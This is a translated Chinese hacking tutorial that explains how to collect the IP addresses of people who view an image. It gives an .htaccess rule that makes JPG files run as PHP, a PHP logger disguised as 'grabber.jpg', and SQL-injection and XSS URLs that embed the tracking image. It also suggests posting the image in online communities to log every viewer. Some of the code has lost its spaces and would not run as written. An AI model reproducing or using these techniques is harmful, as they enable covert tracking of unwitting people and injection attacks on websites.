本日早上起床之后,我看到一篇关于“利用sql注入语句获取ip地址”的文章,对此我很感兴趣,就仔细阅读了一下,在读完这篇文章之后,我有了一个新的想法:通过对htaccess的利用,实现用一张照片获取他人的ip地址
在本教程中,我们将学习如何用一张照片来盗取ip地址。我的想法是通过修正.htaccess文件,将jpg文件当作php文件来解析。
下面便是我们须要向.htaccess中添加的代码:
AddHandlerapplication/x-httpd-php5.jpg
然后将下面的代码复制到记事本中,命名为grabber.jpg
<?php$fh=fopen('ip_list.txt','a');fwrite($fh,$_SERVER['REMOTE_ADDR']."");fclose($fh);$im=imagecreatefromjpeg("n00b.png");header('Content-Type:image/jpeg');imagejpeg($im);imagedestroy($im);?>
将grabber.jpg的权限设置为755,然后再找一张照片,将其命名为n00b.png,接着放到与grabber.jpg相同的目录之中。
就这样,统统事情就绪了。当别人浏览grabber.jpg这张照片的时候,他的ip地址就会被记录下来。
(译者注:须要把这些东西上传至我们的个人网站空间中)
POC:
(译者注:作者这里贴了一张可获取ip的演示照片,为了大家的隐私,我没有将其贴出,读者可自行去作者博客查看)
至此,我们的照片已经可以开始事情了。
接着我还想解释一下如何利用SQLi来获取ip地址。实在利用照片来盗取ip地址十分快捷,我们没有情由去利用SQLi这种方法,但是为了让读者获取到更多的知识,我还是解释一下吧:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#
现在,再说一下如何利用xss来获取ip地址:
http://leettime.net/xsslab1/chalg1.php?name=<imgsrc="http://leettime.net/idiots_test_lab/imageip/tryme.jpg">&submit=Search
好了,便是这些了。
我们可以用这个技巧做许多有趣的事情,事实上大部分社区都许可我们发布一些照片,以是我们可以用这个方法去获取所有访问到我们照片的人的ip地址。
感激您的阅读,Happy Hacking!
原文:http://securityidiots.com/Web-Pentest/Tricks/Grab-IP-Address-Using-Image.htmlwatcher编译
